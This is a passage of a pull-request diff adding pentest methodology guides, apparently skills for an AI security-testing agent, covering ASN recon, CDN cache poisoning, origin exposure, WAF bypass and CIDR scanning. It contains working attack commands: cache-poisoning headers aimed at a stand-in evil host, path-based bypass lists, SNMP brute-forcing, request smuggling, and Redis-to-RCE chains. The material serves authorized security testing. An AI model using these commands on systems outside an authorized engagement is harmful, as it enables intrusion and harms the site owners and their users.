### PR TITLE
feat(skills): network asset methodology skills

### DIFF
--- a/strix/skills/network/asn.md
+++ b/strix/skills/network/asn.md
@@ -1,0 +1,141 @@
+---
+name: asn
+description: ASN-driven recon — expand an Autonomous System Number to prefixes, enumerate live hosts and services, and map the attack surface of an organization's owned IP space.
+---
+
+# ASN (Autonomous System Number)
+
+An ASN is a globally unique identifier (e.g. `AS15169`) assigned to an entity that controls one or more IP prefixes and announces routes via BGP. In an authorized engagement, an ASN is a scope anchor: it lets you discover the full set of network blocks an organization owns, then expand outward to live hosts, exposed services, and forgotten infrastructure that DNS-based recon alone misses. The objective is to convert one identifier into a validated, in-scope host/service inventory, then find the weakest exposed surface across that inventory. ASN ownership is fuzzy — confirm each prefix belongs to the target before touching it.
+
+## Attack Surface
+
+- **Announced prefixes** — IPv4/IPv6 CIDR blocks routed by the ASN; the raw address space you are authorized to assess.
+- **Edge/perimeter services** — anything listening on a public IP: web (80/443/8080/8443), SSH (22), RDP (3389), VPN (500/4500/1194/443), mail (25/465/587/993), DNS (53), databases accidentally exposed (3306/5432/6379/27017/9200).
+- **Forgotten / shadow assets** — staging boxes, old appliances (VPN concentrators, firewalls, IP cameras, printers, iDRAC/iLO/IPMI on 623/443), default-credential admin panels.
+- **Cloud vs on-prem mix** — an org's own ASN usually means colo/datacenter/on-prem; cloud assets live in the provider's ASN (AWS AS16509, GCP AS15169, Azure AS8075) and must be attributed by tenancy, not ASN ownership.
+- **Reverse DNS / PTR space** — hostnames bound to IPs reveal naming conventions, environments (`vpn-`, `dev-`, `mail-`), and tech.
+- **TLS certificates** — SANs on every HTTPS host link IPs back to domains and sibling infrastructure.
+
+## Recon & Enumeration
+
+Most tools below are already in the Kali sandbox. Install the few that are not.
+
+```bash
+# --- ASN -> prefixes ---------------------------------------------------------
+# Whois the ASN and pull route objects
+whois -h whois.radb.net -- '-i origin AS15169' | awk '/^route/ {print $2}' | sort -u
+whois AS15169                                   # org, contacts, abuse handle
+
+# ProjectDiscovery asnmap (install if missing): ASN/org/IP/domain -> CIDRs
+go install github.com/projectdiscovery/asnmap/cmd/asnmap@latest
+asnmap -a AS15169 -silent                       # prefixes for an ASN
+asnmap -d target.tld -silent                    # ASN(s) behind a domain
+echo target.tld | asnmap -silent | tee prefixes.txt
+
+# Cross-check with BGP data sources (no key needed)
+curl -s "https://api.bgpview.io/asn/15169/prefixes" | jq -r '.data.ipv4_prefixes[].prefix'
+curl -s "https://stat.ripe.net/data/announced-prefixes/data.json?resource=AS15169" \
+  | jq -r '.data.prefixes[].prefix'
+
+# Find sibling ASNs / org footprint by org name
+curl -s "https://api.bgpview.io/search?query_term=ExampleCorp" | jq -r '.data.asns[].asn'
+
+# --- attribute & confirm ownership BEFORE scanning ---------------------------
+# Reverse DNS sweep to sanity-check that PTRs reference the target
+mapcidr -cidr prefixes.txt -silent | dnsx -ptr -resp-only -silent   # install: go install .../dnsx, .../mapcidr
+
+# --- prefixes -> live hosts --------------------------------------------------
+mapcidr -cl prefixes.txt -silent > all_ips.txt            # expand CIDRs to IPs
+naabu -list all_ips.txt -top-ports 1000 -rate 1000 -silent -o open_ports.txt
+# Or nmap host discovery on big space (no port scan, fast)
+nmap -sn -iL prefixes.txt -oA hosts_alive --min-rate 2000
+
+# --- services & versions -----------------------------------------------------
+nmap -sV -sC -Pn -iL live_hosts.txt --top-ports 200 -oA services --min-rate 1500
+naabu -list live_hosts.txt -p - -rate 2000 -silent | nmap -sV -iL - -oA full
+
+# --- web layer ---------------------------------------------------------------
+cut -d: -f1 open_ports.txt | sort -u | httpx -silent -title -tech-detect \
+  -status-code -tls-grab -cdn -o web.txt
+# TLS SAN harvesting -> new in-scope domains
+cat live_hosts.txt | httpx -silent -tls-grab -json | jq -r '.tls.subject_an[]?' | sort -u
+
+# --- vuln + content ----------------------------------------------------------
+nuclei -l web.txt -as -s critical,high -rl 50 -c 20 -bs 20 -timeout 10 -retries 1 -j -o nuclei.jsonl
+wafw00f -i web.txt                               # WAF/edge fingerprint
+katana -list web.txt -d 2 -jc -silent -o urls.txt
+ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
+  -u https://HOST/FUZZ -mc 200,301,302,401,403 -t 40   # per interesting host
+```
+
+## Methodology
+
+1. **Establish authorization & scope.** Confirm the engagement covers the ASN and that prefixes you discover are actually owned by the target (lease vs ownership matters). Maintain a scope allowlist; drop any prefix you cannot attribute.
+2. **Resolve the ASN.** From a domain, `asnmap -d target.tld`; from an org name, `bgpview.io/search`. Note sibling ASNs — orgs often have several (acquisitions, regions).
+3. **Expand to prefixes.** Union of `asnmap`, RIPEstat announced-prefixes, and BGPView. De-dupe IPv4 and IPv6 separately. Don't forget IPv6 — it is routinely under-monitored.
+4. **Attribute prefixes.** PTR sweep + whois per block. Flag cloud-provider ASNs as out-of-scope-by-ownership and reconcile against the rules of engagement.
+5. **Host discovery.** Expand CIDRs with `mapcidr`, then `naabu`/`nmap -sn` to find live hosts. Rate-limit; large `/16`s are noisy.
+6. **Service enumeration.** Port-scan live hosts, then `-sV -sC` for versions and default scripts. Capture banners for offline triage.
+7. **Web & TLS layer.** `httpx` for titles/tech/TLS; mine SAN fields for additional domains, loop those back through DNS/subfinder recon.
+8. **Targeted vuln assessment.** Drive `nuclei -as`, then dig into appliances, admin panels, and outdated services found in steps 6–7.
+9. **Prioritize & validate.** Rank by exploitability and exposure (unauth admin > default creds > known CVE on edge > info leak). Build PoCs for top findings.
+
+## Key Weaknesses / Techniques
+
+- **Exposed management/admin interfaces.** iLO/iDRAC/IPMI (623/udp, 443), ESXi (443/902), printers, switches, NAS, VPN admin. Often default or weak creds.
+  ```bash
+  nuclei -l web.txt -tags exposure,panel,default-login -s high,critical -silent
+  nmap -p623 -sU --script ipmi-version,ipmi-cipher-zero -iL live_hosts.txt   # IPMI cipher-0 auth bypass
+  ```
+- **Database / cache exposed to the internet.** Redis, Mongo, Elasticsearch, Memcached, Postgres/MySQL bound to public IPs.
+  ```bash
+  nmap -p6379,27017,9200,11211,5432,3306 --script "*-info,*-databases,*-unauth" -iL live_hosts.txt
+  redis-cli -h HOST ping            # PONG with no AUTH = unauthenticated access
+  curl -s http://HOST:9200/_cat/indices    # open Elasticsearch
+  ```
+- **Outdated edge software / known CVEs.** Citrix, Fortinet, Pulse/Ivanti, Exchange, F5 — perimeter gear is high value. Match `nmap -sV` banners to CVEs and confirm with version-specific nuclei templates.
+- **Default & weak credentials** on SSH/RDP/web panels found across the block. Spray conservatively and only with authorized scope; one shared default often unlocks many hosts on the same ASN.
+- **Stale TLS / expired certs / wildcard reuse.** Reveal forgotten hosts and shared key material.
+  ```bash
+  cat live_hosts.txt | httpx -tls-grab -json -silent \
+    | jq -r 'select(.tls.not_after < (now|todate)) | .host'   # expired certs
+  ```
+- **rDNS / banner intelligence.** PTRs and SSH/HTTP banners leak naming schemes and software, narrowing where to focus.
+- **Routing / origin spoofability** (deeper): an ASN that accepts unfiltered route announcements or lacks RPKI ROAs is exposed to prefix hijack — report as a configuration weakness, do not announce routes.
+
+## Validation
+
+- **Liveness + ownership:** for each reported host, show the IP falls in a prefix announced by the in-scope ASN (`asnmap`/RIPEstat output) and that PTR/whois/TLS SAN ties it to the target. A finding on a misattributed IP is invalid.
+- **Service exposure:** capture the raw banner/response proving the service is reachable from the public internet, e.g. `nmap -sV` output, `redis-cli ... ping` → `PONG`, or `curl` returning data without auth.
+- **Vuln confirmation:** reproduce the nuclei/manual finding with a minimal, non-destructive PoC (a single request that returns version data, an unauthenticated index listing, or a read-only command). Save request/response pairs.
+- **Reachability sanity:** re-run from a clean network path to rule out a transient route or your own caching; confirm the same IP and port respond.
+
+## False Positives
+
+- **Misattributed prefixes** — IP space leased to a third party, CDN/cloud ranges, or a sibling org outside scope. Always confirm ownership before claiming a finding.
+- **Cloud/CDN front IPs** — `httpx -cdn` flags Cloudflare/Akamai/Fastly; the "host" is shared edge infrastructure, not the target's box. Findings there are usually the provider's, not the client's.
+- **Filtered vs closed** — `naabu`/`nmap` over rate-limited paths report phantom open ports; re-scan slower and confirm with a real handshake.
+- **Stale BGP/DNS data** — prefixes withdrawn since last route-collector update; verify the prefix is currently announced.
+- **Honeypots/tarpits** — hosts that answer every port. If `nmap` shows hundreds of open ports with identical banners, treat as decoy.
+- **Shared hosting** — one IP, many unrelated vhosts; the vuln may belong to a co-tenant. Validate by Host header / SNI.
+
+## Chaining & Impact
+
+- ASN → prefixes → **exposed Redis/Mongo with no auth** → data exfiltration or, via Redis, write SSH keys / cron for RCE on the host.
+- ASN → **unauth IPMI/iDRAC/iLO** → out-of-band server control → boot to attacker media → full host compromise, persistence below the OS.
+- ASN → **outdated VPN/firewall (Fortinet/Ivanti/Citrix) CVE** → pre-auth foothold → pivot into the internal network the appliance protects.
+- ASN → **TLS SAN harvesting** → new apex domains → subdomain recon → app-layer vulns (then hand off to the relevant app skill, e.g. ssrf/graphql).
+- ASN → **default-cred admin panel on a shadow host** → lateral movement to peers sharing the same management VLAN / credentials.
+- Single weak host on the ASN frequently shares credentials, images, or trust with the rest of the block — one foothold tends to generalize.
+
+## Pro Tips
+
+1. Treat ASN ownership as a hypothesis, not a fact. Confirm every prefix via PTR + whois + TLS before scanning; mis-scope is the fastest way to test out-of-scope systems.
+2. Always include IPv6 prefixes — defenders monitor and firewall them far less than IPv4.
+3. Orgs own multiple ASNs. Pivot from org name in BGPView and check acquisitions; the juicy host is often on the forgotten secondary ASN.
+4. Cloud assets are NOT in the org's ASN. Don't expect AWS/Azure boxes here; attribute those by account/tenant, not by route origin.
+5. Mine TLS SAN fields aggressively — one HTTPS host on the block can reveal a dozen new in-scope domains for the next recon loop.
+6. Rate-limit on production address space. A `/16` blasted at full speed trips IDS and can disrupt live services; keep `naabu -rate` and `nmap --min-rate` modest and run during agreed windows.
+7. PTR naming conventions are a map: `vpn-`, `dev-`, `staging-`, `mgmt-`, `bastion-` tell you exactly where to look first.
+8. Re-resolve prefixes at the start of each engagement day; BGP announcements change and assets appear/disappear.
+9. Feed `httpx -json` and `nmap -oX` into a single inventory; dedupe by IP+port so re-scans stay incremental and explainable.

--- a/strix/skills/network/cdn_edge.md
+++ b/strix/skills/network/cdn_edge.md
@@ -1,0 +1,186 @@
+---
+name: cdn_edge
+description: CDN/edge testing for cache poisoning, origin IP exposure, and edge-rule (WAF/routing) bypasses.
+---
+
+# CDN / Edge Infrastructure
+
+A CDN/edge layer (Cloudflare, Akamai, Fastly/Varnish, CloudFront, Azure Front Door, Google Cloud CDN, Bunny, custom Nginx/Varnish) sits between clients and origin, caching responses and enforcing routing, TLS, and WAF rules. The attacker's objective is to make the edge serve attacker-controlled or unauthorized content to other users (cache poisoning/deception), reach the origin directly to defeat WAF and rate limiting (origin exposure), or trick edge routing/auth rules into serving content they should block (edge-rule bypass).
+
+## Attack Surface
+
+**Edge entry points**
+- Cache key composition: which headers/params/cookies are (un)keyed determines poisoning surface
+- Unkeyed inputs reflected into responses: `X-Forwarded-Host`, `X-Forwarded-Scheme`, `X-Forwarded-For`, `X-Forwarded-Prefix`, `X-Original-URL`, `X-Rewrite-URL`, `Forwarded`, custom `X-Host`/`X-Real-IP`
+- Path normalization and delimiter handling: `;`, `%2f`, `..%2f`, `//`, trailing-slash, fat GET, `#` fragment truncation differences between edge and origin
+- Routing/WAF rules: geo/IP allowlists, header-based auth at the edge, `robots.txt`/`/admin` blocks, signed-URL/token gates
+- Origin pull config: host header sent to origin, origin auth secret, allowed origin IP ranges
+
+**Exposed assets**
+- Origin IP (defeats DDoS/WAF), origin hostname, edge API tokens, purge/management endpoints
+- Cached secrets: responses that should be private (auth pages, API JSON, error stacks) cached and served to all
+- SSRF pivots via misconfigured edge workers/functions (Cloudflare Workers, Lambda@Edge, Fastly Compute)
+
+## Recon & Enumeration
+
+Concrete commands (tools already in the Kali sandbox):
+
+```bash
+# 1. Fingerprint the edge / WAF
+wafw00f https://target.tld
+httpx -u https://target.tld -title -tech-detect -server -ip -cdn -location -status-code
+# httpx -cdn flags whether the IP belongs to a known CDN range (uses cdncheck)
+
+# 2. Inspect headers that reveal edge + cache behavior
+httpx -u https://target.tld -include-response -hash sha256 \
+  -H "Pragma: akamai-x-cache-on, akamai-x-get-cache-key, akamai-x-check-cacheable"
+# Look for: Age, X-Cache(HIT/MISS), CF-Cache-Status, X-Served-By, X-Cache-Hits,
+#   Via, X-Amz-Cf-Pop, X-Akamai-*, Fastly-Debug, Vary
+
+# 3. Find subdomains + non-CDN origins (subdomains often bypass the edge)
+subfinder -d target.tld -all -silent | dnsx -a -resp-only -silent | sort -u
+# Resolve each candidate and compare IP against CDN ranges:
+subfinder -d target.tld -silent | httpx -ip -cdn -json -silent -o hosts.json
+
+# 4. Discover routes/params for cache-key + reflection testing
+katana -u https://target.tld -jc -kf all -d 3 -silent -o urls.txt
+ffuf -u https://target.tld/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -mc all -fc 404
+
+# 5. Templated checks for CDN/edge misconfig and origin disclosure
+nuclei -u https://target.tld -tags cache,cloudflare,akamai,fastly,cdn,exposure,misconfig \
+  -s critical,high,medium -rl 50 -c 20 -bs 20 -timeout 10 -retries 1 -j -o cdn_nuclei.jsonl
+
+# 6. Confirm blind/edge SSRF & cache callbacks out-of-band
+interactsh-client -v   # use the *.oast.fun host in injected Host/X-Forwarded-Host
+```
+
+Asset-specific tools to install when needed:
+
+```bash
+# Origin discovery via cert/passive sources and SAN pivoting
+pip install censys shodan        # censys/shodan host searches for origin IP
+go install github.com/projectdiscovery/cdncheck/cmd/cdncheck@latest   # classify IP->CDN/cloud/waf
+# CNAME / fronting / takeover checks
+go install github.com/projectdiscovery/dnsx/cmd/dnsx@latest
+# Param-Miner-style cache poisoning automation:
+pip3 install web-cache-deception || git clone https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner  # (wcvs binary)
+go install github.com/Hackmanit/Web-Cache-Vulnerability-Scanner@latest   # wcvs
+# Request smuggling (CL.TE / TE.CL at the edge):
+pip install smuggler || git clone https://github.com/defparam/smuggling   # smuggler.py
+```
+
+## Methodology
+
+1. **Fingerprint the edge.** Identify CDN/WAF (`wafw00f`, `httpx -cdn`, response headers `Server`, `Via`, `CF-RAY`, `X-Amz-Cf-Id`, `X-Served-By`). Note the caching engine — behavior differs sharply across Cloudflare/CloudFront/Akamai/Fastly/Varnish.
+2. **Map cache behavior.** Send the same request twice; watch `Age`, `X-Cache`, `CF-Cache-Status` flip MISS→HIT. Identify what is cached (status, extensions, paths) and the `Vary` set. Probe TTLs by re-requesting and reading `Age`.
+3. **Determine the cache key.** Add/change one header or query param per request; if the response changes but cache status stays HIT (or a poisoned value persists), that input is unkeyed — the prime poisoning vector. Test `X-Forwarded-Host`, `X-Forwarded-Scheme`, `X-Original-URL`, port in `Host`, and unkeyed query params.
+4. **Hunt origin IP.** Search Censys/Shodan/SecurityTrails for the cert CN/SAN and favicon hash; check historical DNS, non-CDN subdomains (mail., dev., staging., direct-), SPF/MX records, and SSRF/error leaks. Validate any candidate by requesting the site directly with the real `Host`.
+5. **Test edge-rule bypass.** For each edge-blocked path/auth/geo rule, try path normalization, method override, header overrides (`X-Original-URL`, `X-Rewrite-URL`), case/encoding, and origin-direct requests that skip the edge entirely.
+6. **Test cache poisoning & deception.** Poison via unkeyed reflected inputs; deceive via path confusion (`/account.php/nonexistent.css`) so private content is cached under a static-looking key.
+7. **Assess request smuggling.** Where the edge and origin disagree on `Content-Length`/`Transfer-Encoding`, smuggling can poison the socket and the cache for all users.
+8. **Validate, scope blast radius, document.** Prove a second, clean client receives the poisoned/leaked response, then stop.
+
+## Key Weaknesses / Techniques
+
+### Cache poisoning via unkeyed headers
+Reflected, unkeyed input poisons cached HTML/JS for every visitor.
+```bash
+# X-Forwarded-Host reflected into an absolute resource URL, unkeyed -> stored
+curl -s "https://target.tld/?cb=$RANDOM" -H "X-Forwarded-Host: evil.attacker-poc.test" -D- -o resp.html
+# If a <script>/<link>/redirect now points to evil.attacker-poc.test, re-request WITHOUT
+# the header; a cached HIT still showing the evil host == confirmed poisoning.
+grep -i "attacker-poc.test" resp.html
+# Automated discovery of unkeyed/cache-affecting params and headers:
+wcvs -u https://target.tld -gb /tmp/headers.txt -hw /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
+```
+Also test `X-Forwarded-Scheme: http` / `X-Forwarded-Proto` (forces cached 301 to `http://`), `X-Forwarded-Port`, `X-Forwarded-Prefix`, and unkeyed query params (UTM-style) reflected into the page.
+
+### Web cache deception
+Trick the edge into caching authenticated/private content under a static-looking key.
+```bash
+# Authenticated request to a path that origin maps to a dynamic page but edge caches by extension
+curl -s --cookie "session=<victim-or-self-auth>" "https://target.tld/account/profile/nonexistent.css" -D-
+# If origin returns the profile (200) and edge caches it (Age increments, X-Cache: HIT),
+# fetch the SAME URL unauthenticated -> if you get the victim's data, it's confirmed.
+for d in .css .js .jpg /%2e%2e/x.css ';foo.css' '%00.css'; do
+  curl -s -o /dev/null -w "%{http_code} %{url_effective}\n" "https://target.tld/account/profile$d"
+done
+```
+Delimiter discrepancies (`;`, `%3b`, `%23`, `%2f`, `?`, fat-path) between edge cache-key derivation and origin routing are the root cause.
+
+### Origin IP exposure (WAF/DDoS bypass)
+```bash
+# Pivot from certificate SANs / favicon / historical DNS to a direct origin IP
+cdncheck -i $(dnsx -silent -a -resp-only -d target.tld | tr '\n' ',')   # which IPs are NOT behind a CDN
+# Candidate validation: request the protected vhost directly, bypassing edge + WAF
+curl -sk --resolve target.tld:443:<ORIGIN_IP> "https://target.tld/" -D- -o origin.html
+# Compare body hash to the CDN-served page; matching content from a non-CDN IP = exposed origin.
+httpx -u https://<ORIGIN_IP> -H "Host: target.tld" -title -status-code -content-length
+```
+Confirm the WAF is bypassed by sending a payload the edge blocks (e.g. `?q=<script>` returning 403 at edge) directly to the origin and observing it pass.
+
+### Edge-rule / WAF bypass
+```bash
+# Edge blocks /admin but origin trusts X-Original-URL / path tricks
+for p in "/admin" "/Admin" "/%61dmin" "/./admin" "/admin/." "/admin..;/" "/admin%2f" "//admin"; do
+  curl -s -o /dev/null -w "%{http_code} $p\n" "https://target.tld$p"; done
+curl -s "https://target.tld/" -H "X-Original-URL: /admin" -D-      # edge routes /, origin honors override
+curl -s "https://target.tld/" -H "X-Rewrite-URL: /admin" -D-
+# Geo/IP allowlist bypass via spoofable client-IP headers when edge trusts them
+curl -s "https://target.tld/internal" -H "X-Forwarded-For: 127.0.0.1" -H "X-Real-IP: 127.0.0.1" -D-
+```
+
+### Request smuggling at the edge
+Edge and origin disagreeing on `CL`/`TE` lets one request poison the next user's response and the cache.
+```bash
+python3 smuggler.py -u https://target.tld          # classifies CL.TE / TE.CL / TE.TE
+# Confirm desync impact carefully; a smuggled request that returns another client's response is the PoC.
+```
+
+### Secrets in edge config / workers
+```bash
+trufflehog filesystem ./edge-config --only-verified      # leaked origin-auth secrets, API tokens
+gitleaks detect -s ./edge-config -v
+semgrep --config=auto ./worker-src                       # Cloudflare Workers / Lambda@Edge SSRF, open redirect
+# Cached management endpoints / exposed purge APIs:
+nuclei -u https://target.tld -tags exposure,config -s high,critical -silent
+```
+
+## Validation
+
+1. **Cache poisoning:** Inject once; then issue a clean request from a different IP/cache region (or new edge POP) with no special headers and confirm the poisoned value is returned on a cache HIT (`Age` > 0, `X-Cache: HIT`). Two distinct clients receiving the malicious payload proves cross-user impact.
+2. **Web cache deception:** Authenticate as account A, prime the cache on the static-looking URL, then fetch the identical URL as an unauthenticated/account-B client and show A's private data returned. Self-to-self only; never harvest a real victim.
+3. **Origin exposure:** Show the origin IP (non-CDN per `cdncheck`) returns byte-identical or clearly-the-same content with `--resolve target.tld:443:<IP>`, and that a WAF-blocked payload succeeds direct-to-origin. Capture both the edge 403 and the origin 200.
+4. **Edge-rule bypass:** Capture the blocked request (403/404 at edge) and the bypass request (200 + sensitive content) side by side, including the exact header/path that triggered it.
+5. Always record full request/response pairs (`-D-`), the cache-status headers, the POP/region, and a timestamp so TTL-bound findings are reproducible.
+
+## False Positives
+
+- `X-Cache: HIT` on truly static assets (images/CSS) with no reflected user input — caching working as designed, not poisoning.
+- Reflected headers that are part of the cache key (`Vary` includes them, or cache stays MISS) — the poison is not stored cross-user; only your own request is affected.
+- A "found origin IP" that is itself a CDN/cloud LB range — verify with `cdncheck`/`httpx -cdn` before claiming exposure.
+- Direct-origin content that differs (default vhost, "direct access denied", error page) — origin enforces a shared secret or host check; not a usable bypass.
+- 200 on a normalized path that returns the same public content as the canonical URL — not an auth bypass.
+- Wildcard hosting (`*.cloudfront.net`) responding to arbitrary Host headers with generic errors — not an SSRF/poisoning sink.
+- OAST callback whose source IP is the tester/browser, not the edge/origin — client-side, not server-side.
+
+## Chaining & Impact
+
+- Unkeyed header → cache poisoning → stored XSS/malicious JS served to all users → mass session theft / account takeover.
+- `X-Forwarded-Scheme` poisoning → cached redirect-to-`http` or open redirect → credential interception / token leak.
+- Web cache deception → other users' PII/API tokens cached publicly → account takeover, data breach.
+- Origin IP exposure → bypass WAF + rate limiting + DDoS protection → unthrottled credential stuffing, exploit delivery, and L7 DoS straight at origin.
+- Edge auth/geo bypass (`X-Original-URL`, spoofed `X-Forwarded-For`) → reach admin/internal panels the edge was meant to gate.
+- Request smuggling → cache poisoning + request hijacking → harvest other users' authenticated responses, persistent edge-wide compromise.
+- Edge worker SSRF / leaked origin-auth secret → forge trusted-edge requests to origin, defeating origin's "only the CDN can reach me" assumption.
+
+## Pro Tips
+
+1. Cache behavior is per-extension and per-path — a header unkeyed on `/` may be keyed on `/api`. Test poisoning on the highest-traffic cacheable HTML page, not just the root.
+2. Bust the cache with a junk query param (`?cb=<rand>`) while probing so you study origin behavior, then drop it to test what actually gets stored.
+3. Different POPs hold different caches; verify cross-user impact from a second region (proxy/VPN or a different resolver) — a HIT on your own POP can mislead.
+4. Many WAFs only inspect the first body bytes or specific content-types; smuggling and chunked/oversized bodies slip payloads past the edge to origin.
+5. The origin's host/IP allowlist often trusts a static "origin auth" header the CDN injects — if you find that secret (`trufflehog`/leaked config), you can hit origin directly while appearing to be the edge.
+6. Trailing-dot, double-slash, and case variants frequently differ between edge cache-key normalization and origin routing — cheap, high-yield bypass primitives.
+7. Check `robots.txt`, sitemaps, and JS bundles for origin/staging hostnames; devs routinely leave direct-origin URLs hardcoded.
+8. Keep poison payloads benign and self-targeted (`evil.attacker-poc.test`, your own session) and purge/let TTL expire after PoC to avoid lingering impact on real users.

--- a/strix/skills/network/cidr.md
+++ b/strix/skills/network/cidr.md
@@ -1,0 +1,210 @@
+---
+name: cidr
+description: Network range (CIDR) assessment - host discovery, port/service enumeration, and pivoting across the block
+---
+
+# CIDR / Network Range
+
+A CIDR asset is a contiguous block of IP space (e.g. `10.0.0.0/16`, `203.0.113.0/24`) owned or operated by the target. The objective is to convert the bare prefix into a map of live hosts, open ports, and identified services, then assess each exposed service for missing patches, default/weak credentials, misconfiguration, and trust relationships that allow lateral movement deeper into the block. Treat the range as a layered problem: sweep wide and cheap first, then enrich only what answers, and stop noise from drowning real findings. Stay strictly inside the authorized prefix at all times.
+
+## Attack Surface
+
+**Scope**
+- Live hosts across the prefix (responsive to ICMP/ARP/TCP/UDP probes; many will be silent and need `-Pn`)
+- TCP and UDP services on each host (web, SSH, RDP, SMB, RPC, databases, mail, DNS, SNMP, NTP, mDNS)
+- Network infrastructure: routers, switches, firewalls, load balancers, VPN concentrators, management/IPMI/iDRAC/iLO interfaces
+- Virtualization and orchestration endpoints exposed on the block (ESXi, vCenter, Docker 2375/2376, Kubernetes 6443/10250, etcd 2379)
+- Trust boundaries: NFS/SMB shares, LDAP/Kerberos, internal CAs, syslog/SNMP managers, jump hosts
+
+**Entry Points**
+- Internet-facing or internal hosts with unpatched or end-of-life services
+- Default, reused, or weak credentials on admin panels, databases, and network gear
+- Anonymous/guest access (SMB null sessions, anonymous FTP, open NFS exports, unauthenticated Redis/Mongo/Elastic)
+- Forgotten dev/staging hosts, decommissioned-but-live systems, and shadow IT
+- Misconfigured TLS, exposed management planes, and leaked service banners revealing internal naming
+
+**What Is Exposed**
+- Service banners and versions (map directly to CVEs)
+- Hostnames and internal DNS via reverse lookups, TLS SAN/CN, SMB/LDAP, and SNMP
+- Network topology hints from TTLs, traceroutes, and routing/SNMP data
+- Authentication surfaces (SSH, RDP, web logins, VPN portals, database listeners)
+
+## Recon & Enumeration
+
+Define scope once and reuse it. Keep all targets confined to the authorized CIDR.
+
+```
+echo "203.0.113.0/24" > scope.txt          # one CIDR or host per line
+mkdir -p recon && cd recon
+```
+
+**Host discovery (alive hosts only, cheap first):**
+```
+# Fast ping + ARP-style discovery within scope (no port scan)
+nmap -sn -n -PE -PS22,80,443 -PA80,443 -T4 -iL ../scope.txt -oA hosts_alive
+# Pull just the live IPs for downstream tools
+grep "Up$" hosts_alive.gnmap | cut -d' ' -f2 > alive.txt
+# fping is a fast alternative when ICMP is allowed
+fping -a -g 203.0.113.0/24 2>/dev/null > alive_fping.txt
+```
+
+**Port discovery across the block (broad, then verify):**
+```
+# naabu CONNECT scan, top ports, verified, JSON for parsing
+naabu -list alive.txt -top-ports 200 -scan-type c -Pn -rate 500 -c 25 \
+  -timeout 1000 -retries 1 -verify -silent -j -o naabu.jsonl
+# Reduce to host:port pairs for enrichment
+jq -r '"\(.host):\(.port)"' naabu.jsonl > openports.txt
+# masscan for very large ranges when raw sockets are available (bound the rate)
+sudo masscan 203.0.113.0/24 -p1-65535 --rate 1000 -oL masscan.txt   # apt-get install -y masscan
+```
+
+**Service/version + script enrichment (only on discovered ports):**
+```
+# Feed naabu output back to nmap for accurate fingerprints
+nmap -n -Pn -sV -sC --version-intensity 5 --script-timeout 30s --host-timeout 5m \
+  -iL alive.txt -p $(jq -r '.port' naabu.jsonl | sort -un | paste -sd,) -oA services
+```
+
+**UDP sweep (slow, scope tightly to high-value services):**
+```
+nmap -n -Pn -sU --top-ports 25 -T4 --host-timeout 5m -iL alive.txt -oA udp
+# Targets of interest: 53 DNS, 69 TFTP, 123 NTP, 161 SNMP, 500 IKE, 1900 SSDP, 5353 mDNS
+```
+
+**Web layer (probe every web-ish port, fingerprint, scan):**
+```
+httpx -l openports.txt -sc -title -server -td -fr -timeout 10 -retries 1 \
+  -rl 50 -t 25 -silent -j -o httpx.jsonl
+jq -r 'select(.status_code!=null) | .url' httpx.jsonl > weburls.txt
+wafw00f -i weburls.txt                                  # WAF/CDN identity
+nuclei -l weburls.txt -as -s critical,high -rl 50 -c 20 -bs 20 \
+  -timeout 10 -retries 1 -silent -j -o nuclei.jsonl
+katana -list weburls.txt -d 2 -jc -silent -o crawl.txt  # crawl for content/params
+ffuf -u FUZZ/ -w weburls.txt:FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,301,302,401,403 -of json -o ffuf.json
+```
+
+**DNS / naming (resolve hostnames, find vhosts):**
+```
+# Reverse DNS across the block
+dnsx -l alive.txt -ptr -resp -silent -o ptr.txt          # apt-get install -y dnsx  (or projectdiscovery release)
+# Internal zone enumeration if a resolver is in scope
+dnsrecon -r 203.0.113.0/24 -n <internal-dns-ip>          # apt-get install -y dnsrecon
+# TLS SAN/CN harvest reveals internal names and adjacent hosts
+tlsx -l openports.txt -san -cn -silent -o tls_names.txt   # apt-get install -y tlsx
+```
+
+**Asset-specific probes (install as needed in the Kali sandbox):**
+```
+apt-get install -y snmp smbclient ldap-utils nbtscan onesixtyone enum4linux-ng
+pip install impacket                                      # smbexec, secretsdump, GetUserSPNs, rpcdump
+onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt -i alive.txt   # SNMP community brute
+snmpwalk -v2c -c public <host> 1.3.6.1.2.1                # if 'public' answers
+nbtscan -r 203.0.113.0/24                                 # NetBIOS sweep
+enum4linux-ng -A <host>                                   # SMB/RPC/LDAP enumeration
+smbclient -L //<host> -N                                  # null-session share list
+showmount -e <host>                                       # NFS exports
+ldapsearch -x -H ldap://<host> -s base namingContexts     # anonymous LDAP base
+```
+
+## Methodology
+
+1. **Confirm and bound scope.** Expand the CIDR to its host count (`nmap --script targets-asn` or `ipcalc 203.0.113.0/24`). Never probe outside the authorized prefix; split very large blocks into /24 chunks for tractable, restartable runs.
+2. **Discover live hosts.** Layered discovery (ICMP, ARP on-LAN, TCP SYN/ACK to common ports). Keep a list of hosts that answer and a separate list that may be filtered (re-test with `-Pn`).
+3. **Sweep ports cheaply.** Run `naabu`/`masscan` top-ports first to get coverage fast; reserve full `1-65535` for hosts that warrant it. Verify open ports before enrichment.
+4. **Fingerprint services.** Feed verified ports to `nmap -sV -sC` for versions, banners, and safe NSE checks. Record product + version per host:port.
+5. **Triage by exposure.** Bucket findings: web apps, management/admin planes, databases, file shares, network gear, auth services. Prioritize unauthenticated and high-CVSS surfaces.
+6. **Enumerate each service class.** Web (httpx/nuclei/katana/ffuf), SMB/RPC (enum4linux-ng/impacket), SNMP (snmpwalk), LDAP/Kerberos (ldapsearch/GetUserSPNs), NFS (showmount), databases (native clients), TLS (tlsx/sslscan).
+7. **Assess credentials and config.** Check defaults, anonymous access, and weak auth. Validate misconfigurations (open shares, debug endpoints, exposed admin UIs).
+8. **Map trust and pivot.** Identify shared credentials, internal CAs, jump hosts, and segmentation gaps that let one foothold reach deeper subnets.
+9. **Validate and document.** Reproduce each finding with a minimal, non-destructive PoC and capture exact host:port, version, and request/response evidence.
+
+## Key Weaknesses / Techniques
+
+**Unpatched / end-of-life services** — Version banners map to CVEs. Confirm exploitability before claiming impact.
+```
+nmap -n -Pn -sV --script vulners -p <ports> <host>        # NSE vulners (needs internet)
+nuclei -u https://<host> -tags cve -s critical,high -silent
